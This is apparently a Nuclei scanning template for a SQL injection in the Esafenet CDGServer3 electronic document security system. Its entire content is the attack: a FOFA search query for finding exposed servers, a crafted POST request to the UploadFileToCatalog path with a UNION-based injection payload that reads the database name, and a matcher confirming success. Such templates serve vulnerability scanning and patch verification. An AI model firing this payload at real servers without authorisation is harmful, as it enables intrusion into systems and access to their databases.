id: esafenet-cdgserver3-UploadFileToCatalog-sqli

info:
  name: 亿赛通电子文档安全管理系统 UploadFileToCatalog - sqli
  author: leadlife
  severity: high
  description: 
  reference: 
    - 
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="CDGServer3" || title="电子文档安全管理系统" || cert="esafenet" || body="/help/getEditionInfo.jsp"
  tags: esafenet,sqli

http:
  - raw:
      - |
        POST /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded

        id=-999{{url_encode("\' UNION ALL SELECT NULL,ISNULL(CAST(111*111 AS NVARCHAR(4000)),CHAR(32))+\' \'+DB_NAME(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- wiVb")}}

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"12321")